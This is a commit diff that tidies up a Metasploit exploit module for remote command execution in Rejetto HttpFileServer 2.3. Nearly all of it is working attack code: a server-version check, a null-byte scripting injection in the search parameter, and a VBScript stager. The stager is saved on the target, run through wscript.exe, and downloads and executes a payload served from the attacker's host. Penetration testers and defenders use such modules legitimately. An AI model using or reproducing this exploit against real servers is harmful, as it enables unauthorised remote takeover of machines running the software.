Make minor cleanup

modules/exploits/windows/http/http_file_server_exec.rb

@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Reank = NormalRanking
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
@@ -15,12 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "HttpFileServer Remote Command Execution",
+      'Name'           => "Rejetto HttpFileServer Remote Command Execution",
       'Description'    => %q{
-        HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex
-        in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00'
-        to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows
-        XP SP3, Windows 7 SP1 and Windows 8.
+        Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a
+        poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by
+        using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'uri'    => '/'
     })
 
-    if res.headers['Server'] =~ /HFS 2\.3/
-    # added proper regex as pointed by wchen
+    if res &&  res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/
       return Exploit::CheckCode::Detected
     else
       return Exploit::CheckCode::Safe
@@ -72,35 +71,38 @@ class Metasploit3 < Msf::Exploit::Remote
     exe = generate_payload_exe
     vbs = Msf::Util::EXE.to_exe_vbs(exe)
     send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})
-    remove_resource(get_resource)
     # remove resource after serving 1st request as 'exec' execute 4x
     # during exploitation
+    remove_resource(get_resource)
   end
 
   def primer
     file_name = rand_text_alpha(rand(10)+5)
     file_ext = '.vbs'
-    file_fullname = file_name + file_ext
+    file_full_name = file_name + file_ext
 
-    vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText"
+    vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a"
+    vbs_code << "On Error Resume Next\x0d\x0a"
+    vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a"
+    vbs_code << "If Err.Number <> 0 Then\x0d\x0a"
+    vbs_code << "wsh.exit\x0d\x0a"
+    vbs_code << "End If\x0d\x0a"
+    vbs_code << "x.Send\x0d\x0a"
+    vbs_code << "Execute x.responseText"
 
     payloads = [
-      "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}",
-      "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}",
-      # using wscript.exe instead of cmd.exe, thank mubix
-      #"delete|#{datastore['SAVE_PATH']}#{file_fullname}"
-      # delete vbs file after execution
+      "save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}",
+      "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}"
     ]
 
     print_status("Sending a malicious request to #{target_uri.path}")
-    payloads.each { |payload|
+    payloads.each do |payload|
       send_request_raw({
         'method' => 'GET',
         'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
      })
-    }
-    register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}")
-    # use FileDropper method for cleanup
+    end
+    register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}")
   end
 
   def exploit